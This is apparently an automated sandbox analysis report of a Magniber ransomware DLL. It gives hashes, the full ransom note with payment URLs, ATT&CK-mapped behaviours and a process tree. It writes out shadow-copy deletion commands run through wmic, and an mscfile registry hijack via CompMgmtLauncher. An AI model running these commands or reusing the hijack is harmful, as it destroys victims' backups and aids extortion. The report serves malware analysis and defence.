magniber | 22c59e19315ba81452b67c271d46980fac9bc1e6082bed6efcc270e669479d51

Resubmissions

19/08/2021, 01:57

210819-7xxlq9brfj 10

18/08/2021, 02:00

210818-eve5hlsnke 10

Analysis

max time kernel
121s
max time network
173s
platform
windows7_x64
resource
win7v20210410
submitted
19/08/2021, 01:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

22c59e19315ba81452b67c271d46980fac9bc1e6082bed6efcc270e669479d51.dll
Size

21KB
MD5

f9147aeda18f71043955420e853b8d3c
SHA1

a9c6995a91ac8ac6c76379fd38c3fb973273d3b3
SHA256

22c59e19315ba81452b67c271d46980fac9bc1e6082bed6efcc270e669479d51
SHA512

3e38ce57ada7a3fc22c2caf6a882574427c3d0b73cbfc337853017995f27688a5f344157f893f1a70cec2ced15a4a553010031b54e813cacb430670ecd8c251f

Score

10^/10

magniber ransomware

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\readme.txt

Family

magniber

Ransom Note

ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ==================================================================================================== Your files are NOT damaged! Your files are modified only. This modification is reversible. The only 1 way to decrypt your files is to receive the private key and decryption program. Any attempts to restore your files with the third party software will be fatal for your files! ==================================================================================================== To receive the private key and decryption program follow the instructions below: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://081c78083c14c040d2dgvzumt.l5nmxg2syswnc6s3724evnip5uktj7msy3pgowkbcidbei3nbysi7ead.onion/dgvzumt Note! This page is available via "Tor Browser" only. ==================================================================================================== Also you can use temporary addresses on your personal page without using "Tor Browser": http://081c78083c14c040d2dgvzumt.codehes.uno/dgvzumt http://081c78083c14c040d2dgvzumt.partscs.site/dgvzumt http://081c78083c14c040d2dgvzumt.uponmix.xyz/dgvzumt http://081c78083c14c040d2dgvzumt.flysex.space/dgvzumt Note! These are temporary addresses! They will be available for a limited amount of time!

URLs

http://081c78083c14c040d2dgvzumt.l5nmxg2syswnc6s3724evnip5uktj7msy3pgowkbcidbei3nbysi7ead.onion/dgvzumt

http://081c78083c14c040d2dgvzumt.codehes.uno/dgvzumt

http://081c78083c14c040d2dgvzumt.partscs.site/dgvzumt

http://081c78083c14c040d2dgvzumt.uponmix.xyz/dgvzumt

http://081c78083c14c040d2dgvzumt.flysex.space/dgvzumt

Signatures

Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
ransomware magniber

Process spawned unexpected child process 8 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1860	1732	cmd.exe	45
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1676	1732	cmd.exe	45
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	960	1732	cmd.exe	45
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2056	1732	cmd.exe	45
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2500	1732	vssadmin.exe	45
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2508	1732	vssadmin.exe	45
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2516	1732	vssadmin.exe	45
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3032	1732	vssadmin.exe	45

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Modifies extensions of user files 5 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

description	ioc	Process
File renamed	C:\Users\Admin\Pictures\UnprotectPush.crw => C:\Users\Admin\Pictures\UnprotectPush.crw.dgvzumt	taskhost.exe
File renamed	C:\Users\Admin\Pictures\ClearRename.tif => C:\Users\Admin\Pictures\ClearRename.tif.dgvzumt	taskhost.exe
File renamed	C:\Users\Admin\Pictures\GrantSave.png => C:\Users\Admin\Pictures\GrantSave.png.dgvzumt	taskhost.exe
File renamed	C:\Users\Admin\Pictures\JoinEdit.png => C:\Users\Admin\Pictures\JoinEdit.png.dgvzumt	taskhost.exe
File renamed	C:\Users\Admin\Pictures\TestUnprotect.png => C:\Users\Admin\Pictures\TestUnprotect.png.dgvzumt	taskhost.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 1860 set thread context of 1108	1860	rundll32.exe	19
PID 1860 set thread context of 1168	1860	rundll32.exe	20
PID 1860 set thread context of 1196	1860	rundll32.exe	21

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Interacts with shadow copies 2 TTPs 4 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
2516	vssadmin.exe
3032	vssadmin.exe
2500	vssadmin.exe
2508	vssadmin.exe

Modifies Internet Explorer settings 1 TTPs 33 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 4096c1579d94d701	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000566806d70eca5e41a43f007ed5d6b53f00000000020000000000106600000001000020000000f7ebfc97e2137865bf6c28307124973142ce0bb1a142c6765cd9b4bb7e932787000000000e8000000002000020000000a27d366de6b5d2fd92d1f7fa3d8209d84dc6414ed7ff799e053379c41a1e3ed890000000b9920e828667713621fd8c96e600b6f5abbb1c07ef596fc9d41de7623218982ee9bdf4c28f11b45ceedc66965b489f00413a0855d34cdfdaf2a807b30c8037077e73c4dea17c032c039929c91ffb4f74203c29a6b25fd271ca3b64b8f09025484964ce20d8a668c3402cd48a1d1ea648d072c89907d8afcf3bb6cb1e7c3f5f55dc9e00b61b57b70127a651063330d06140000000e72104c9c9192a35d7ba1f8b65b140e5d9bb3b17107e5da0848df0cc2d5531039a2a2344f21c05e80ac0defd54c3428a86c97f216dde59efc2a1f1ac85d2985c	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "335499983"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{7F4CE531-0090-11EC-A000-7A040FF2E5B0} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000566806d70eca5e41a43f007ed5d6b53f00000000020000000000106600000001000020000000aa110090ef86849d154b8fdd7e334073d5bdccf7ddb65e8ec1edfb613a1757a9000000000e8000000002000020000000d8863826a8b5c17684f1a7587624f99c5243fb09f46425528d1cad5c53e1861b20000000374da3ce24d9bfb900026135aa5c2d95aa26243be17e4409735420f17859080c40000000b1ea67fe5b9b0876c6dd827c305a1309012d86a15db0707b82b7a8a58ea89c24ab73415e15ce37fe85eebaf8918cfd215586d69ffd316711e0d6e33a570a416c	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe

Modifies registry class 11 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile	taskhost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	taskhost.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell\open\command	Dwm.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell\open\command	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell\open\command	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell\open\command	taskhost.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell	taskhost.exe
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell\open	taskhost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	Dwm.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	cmd.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
1956	notepad.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1860	rundll32.exe
1860	rundll32.exe

Suspicious behavior: MapViewOfSection 3 IoCs

pid	Process
1860	rundll32.exe
1860	rundll32.exe
1860	rundll32.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	1196	Explorer.EXE
Token: SeShutdownPrivilege	1196	Explorer.EXE
Token: SeIncreaseQuotaPrivilege	1328	WMIC.exe
Token: SeSecurityPrivilege	1328	WMIC.exe
Token: SeTakeOwnershipPrivilege	1328	WMIC.exe
Token: SeLoadDriverPrivilege	1328	WMIC.exe
Token: SeSystemProfilePrivilege	1328	WMIC.exe
Token: SeSystemtimePrivilege	1328	WMIC.exe
Token: SeProfSingleProcessPrivilege	1328	WMIC.exe
Token: SeIncBasePriorityPrivilege	1328	WMIC.exe
Token: SeCreatePagefilePrivilege	1328	WMIC.exe
Token: SeBackupPrivilege	1328	WMIC.exe
Token: SeRestorePrivilege	1328	WMIC.exe
Token: SeShutdownPrivilege	1328	WMIC.exe
Token: SeDebugPrivilege	1328	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1328	WMIC.exe
Token: SeRemoteShutdownPrivilege	1328	WMIC.exe
Token: SeUndockPrivilege	1328	WMIC.exe
Token: SeManageVolumePrivilege	1328	WMIC.exe
Token: 33	1328	WMIC.exe
Token: 34	1328	WMIC.exe
Token: 35	1328	WMIC.exe
Token: SeShutdownPrivilege	1196	Explorer.EXE
Token: SeShutdownPrivilege	1196	Explorer.EXE
Token: SeIncreaseQuotaPrivilege	1272	WMIC.exe
Token: SeSecurityPrivilege	1272	WMIC.exe
Token: SeTakeOwnershipPrivilege	1272	WMIC.exe
Token: SeLoadDriverPrivilege	1272	WMIC.exe
Token: SeSystemProfilePrivilege	1272	WMIC.exe
Token: SeSystemtimePrivilege	1272	WMIC.exe
Token: SeProfSingleProcessPrivilege	1272	WMIC.exe
Token: SeIncBasePriorityPrivilege	1272	WMIC.exe
Token: SeCreatePagefilePrivilege	1272	WMIC.exe
Token: SeBackupPrivilege	1272	WMIC.exe
Token: SeRestorePrivilege	1272	WMIC.exe
Token: SeShutdownPrivilege	1272	WMIC.exe
Token: SeDebugPrivilege	1272	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1272	WMIC.exe
Token: SeRemoteShutdownPrivilege	1272	WMIC.exe
Token: SeUndockPrivilege	1272	WMIC.exe
Token: SeManageVolumePrivilege	1272	WMIC.exe
Token: 33	1272	WMIC.exe
Token: 34	1272	WMIC.exe
Token: 35	1272	WMIC.exe
Token: SeIncreaseQuotaPrivilege	620	WMIC.exe
Token: SeSecurityPrivilege	620	WMIC.exe
Token: SeTakeOwnershipPrivilege	620	WMIC.exe
Token: SeLoadDriverPrivilege	620	WMIC.exe
Token: SeSystemProfilePrivilege	620	WMIC.exe
Token: SeSystemtimePrivilege	620	WMIC.exe
Token: SeProfSingleProcessPrivilege	620	WMIC.exe
Token: SeIncBasePriorityPrivilege	620	WMIC.exe
Token: SeCreatePagefilePrivilege	620	WMIC.exe
Token: SeBackupPrivilege	620	WMIC.exe
Token: SeRestorePrivilege	620	WMIC.exe
Token: SeShutdownPrivilege	620	WMIC.exe
Token: SeDebugPrivilege	620	WMIC.exe
Token: SeSystemEnvironmentPrivilege	620	WMIC.exe
Token: SeRemoteShutdownPrivilege	620	WMIC.exe
Token: SeUndockPrivilege	620	WMIC.exe
Token: SeManageVolumePrivilege	620	WMIC.exe
Token: 33	620	WMIC.exe
Token: 34	620	WMIC.exe
Token: 35	620	WMIC.exe

Suspicious use of FindShellTrayWindow 6 IoCs

pid	Process
1196	Explorer.EXE
1192	iexplore.exe
1196	Explorer.EXE
1196	Explorer.EXE
1196	Explorer.EXE
1196	Explorer.EXE

Suspicious use of SendNotifyMessage 6 IoCs

pid	Process
1196	Explorer.EXE
1196	Explorer.EXE
1196	Explorer.EXE
1196	Explorer.EXE
1196	Explorer.EXE
1196	Explorer.EXE

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
1192	iexplore.exe
1192	iexplore.exe
1552	IEXPLORE.EXE
1552	IEXPLORE.EXE
1552	IEXPLORE.EXE
1552	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 61 IoCs

description	pid	Process	procid_target
PID 1108 wrote to memory of 1956	1108	taskhost.exe	26
PID 1108 wrote to memory of 1956	1108	taskhost.exe	26
PID 1108 wrote to memory of 1956	1108	taskhost.exe	26
PID 1108 wrote to memory of 1764	1108	taskhost.exe	27
PID 1108 wrote to memory of 1764	1108	taskhost.exe	27
PID 1108 wrote to memory of 1764	1108	taskhost.exe	27
PID 1108 wrote to memory of 1752	1108	taskhost.exe	28
PID 1108 wrote to memory of 1752	1108	taskhost.exe	28
PID 1108 wrote to memory of 1752	1108	taskhost.exe	28
PID 1752 wrote to memory of 1328	1752	cmd.exe	31
PID 1752 wrote to memory of 1328	1752	cmd.exe	31
PID 1752 wrote to memory of 1328	1752	cmd.exe	31
PID 1764 wrote to memory of 1192	1764	cmd.exe	32
PID 1764 wrote to memory of 1192	1764	cmd.exe	32
PID 1764 wrote to memory of 1192	1764	cmd.exe	32
PID 1168 wrote to memory of 1468	1168	Dwm.exe	34
PID 1168 wrote to memory of 1468	1168	Dwm.exe	34
PID 1168 wrote to memory of 1468	1168	Dwm.exe	34
PID 1196 wrote to memory of 656	1196	Explorer.EXE	33
PID 1196 wrote to memory of 656	1196	Explorer.EXE	33
PID 1196 wrote to memory of 656	1196	Explorer.EXE	33
PID 1468 wrote to memory of 620	1468	cmd.exe	38
PID 1468 wrote to memory of 620	1468	cmd.exe	38
PID 1468 wrote to memory of 620	1468	cmd.exe	38
PID 656 wrote to memory of 1272	656	cmd.exe	39
PID 656 wrote to memory of 1272	656	cmd.exe	39
PID 656 wrote to memory of 1272	656	cmd.exe	39
PID 1860 wrote to memory of 1048	1860	cmd.exe	40
PID 1860 wrote to memory of 1048	1860	cmd.exe	40
PID 1860 wrote to memory of 1048	1860	cmd.exe	40
PID 1048 wrote to memory of 940	1048	cmd.exe	42
PID 1048 wrote to memory of 940	1048	cmd.exe	42
PID 1048 wrote to memory of 940	1048	cmd.exe	42
PID 1192 wrote to memory of 1552	1192	iexplore.exe	48
PID 1192 wrote to memory of 1552	1192	iexplore.exe	48
PID 1192 wrote to memory of 1552	1192	iexplore.exe	48
PID 1192 wrote to memory of 1552	1192	iexplore.exe	48
PID 1860 wrote to memory of 2168	1860	cmd.exe	57
PID 1860 wrote to memory of 2168	1860	cmd.exe	57
PID 1860 wrote to memory of 2168	1860	cmd.exe	57
PID 1676 wrote to memory of 2180	1676	cmd.exe	58
PID 1676 wrote to memory of 2180	1676	cmd.exe	58
PID 1676 wrote to memory of 2180	1676	cmd.exe	58
PID 960 wrote to memory of 2196	960	cmd.exe	59
PID 960 wrote to memory of 2196	960	cmd.exe	59
PID 960 wrote to memory of 2196	960	cmd.exe	59
PID 2056 wrote to memory of 2224	2056	cmd.exe	60
PID 2056 wrote to memory of 2224	2056	cmd.exe	60
PID 2056 wrote to memory of 2224	2056	cmd.exe	60
PID 2224 wrote to memory of 2332	2224	CompMgmtLauncher.exe	62
PID 2224 wrote to memory of 2332	2224	CompMgmtLauncher.exe	62
PID 2224 wrote to memory of 2332	2224	CompMgmtLauncher.exe	62
PID 2196 wrote to memory of 2340	2196	CompMgmtLauncher.exe	61
PID 2196 wrote to memory of 2340	2196	CompMgmtLauncher.exe	61
PID 2196 wrote to memory of 2340	2196	CompMgmtLauncher.exe	61
PID 2180 wrote to memory of 2352	2180	CompMgmtLauncher.exe	63
PID 2180 wrote to memory of 2352	2180	CompMgmtLauncher.exe	63
PID 2180 wrote to memory of 2352	2180	CompMgmtLauncher.exe	63
PID 2168 wrote to memory of 2948	2168	CompMgmtLauncher.exe	76
PID 2168 wrote to memory of 2948	2168	CompMgmtLauncher.exe	76
PID 2168 wrote to memory of 2948	2168	CompMgmtLauncher.exe	76

C:\Windows\system32\taskhost.exe
"taskhost.exe"
1⤵
- Modifies extensions of user files
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1108
- C:\Windows\system32\notepad.exe
  notepad.exe C:\Users\Public\readme.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:1956
- C:\Windows\system32\cmd.exe
  cmd /c "start http://081c78083c14c040d2dgvzumt.codehes.uno/dgvzumt^&1^&49714945^&66^&315^&12"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1764
- - C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" http://081c78083c14c040d2dgvzumt.codehes.uno/dgvzumt&1&49714945&66&315&12
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:1192
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1192 CREDAT:275457 /prefetch:2
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:1552
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1752
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1328

C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1168
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1468
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:620

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1196
- C:\Windows\system32\rundll32.exe
  rundll32.exe C:\Users\Admin\AppData\Local\Temp\22c59e19315ba81452b67c271d46980fac9bc1e6082bed6efcc270e669479d51.dll,#1
  2⤵
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  PID:1860
- - C:\Windows\system32\cmd.exe
    cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1048
  - - C:\Windows\system32\wbem\WMIC.exe
      C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
      4⤵
      PID:940
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:656
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1272

C:\Windows\system32\cmd.exe
cmd /c CompMgmtLauncher.exe
1⤵
- Process spawned unexpected child process
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1860
- C:\Windows\system32\CompMgmtLauncher.exe
  CompMgmtLauncher.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2168
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:2948

C:\Windows\system32\cmd.exe
cmd /c CompMgmtLauncher.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1676
- C:\Windows\system32\CompMgmtLauncher.exe
  CompMgmtLauncher.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2180
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:2352

C:\Windows\system32\cmd.exe
cmd /c CompMgmtLauncher.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:960
- C:\Windows\system32\CompMgmtLauncher.exe
  CompMgmtLauncher.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2196
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:2340

C:\Windows\system32\cmd.exe
cmd /c CompMgmtLauncher.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2056
- C:\Windows\system32\CompMgmtLauncher.exe
  CompMgmtLauncher.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2224
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:2332

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2500

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2508

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2516

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:2640

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:3032

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File Deletion

T1107

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1108-74-0x0000000001C60000-0x0000000001C64000-memory.dmp

Filesize
16KB

Download
memory/1196-60-0x0000000002AE0000-0x0000000002AF0000-memory.dmp

Filesize
64KB

Download
memory/1552-102-0x00000000004A0000-0x00000000004A2000-memory.dmp

Filesize
8KB

Download
memory/1552-101-0x0000000075591000-0x0000000075593000-memory.dmp

Filesize
8KB

Download
memory/1860-62-0x0000000000190000-0x0000000000191000-memory.dmp

Filesize
4KB

Download
memory/1860-73-0x0000000001D30000-0x0000000001D31000-memory.dmp

Filesize
4KB

Download
memory/1860-61-0x0000000000180000-0x0000000000181000-memory.dmp

Filesize
4KB

Download
memory/1860-65-0x0000000001CB0000-0x0000000001CB1000-memory.dmp

Filesize
4KB

Download
memory/1860-69-0x0000000001D00000-0x0000000001D01000-memory.dmp

Filesize
4KB

Download
memory/1860-68-0x0000000001CD0000-0x0000000001CD1000-memory.dmp

Filesize
4KB

Download
memory/1860-64-0x0000000001CA0000-0x0000000001CA1000-memory.dmp

Filesize
4KB

Download
memory/1860-70-0x0000000001D10000-0x0000000001D11000-memory.dmp

Filesize
4KB

Download
memory/1860-75-0x0000000001FA0000-0x0000000001FA1000-memory.dmp

Filesize
4KB

Download
memory/1860-98-0x0000000001FC0000-0x0000000001FC1000-memory.dmp

Filesize
4KB

Download
memory/1860-63-0x0000000001C90000-0x0000000001C91000-memory.dmp

Filesize
4KB

Download
memory/1860-66-0x0000000001CC0000-0x0000000001CC1000-memory.dmp

Filesize
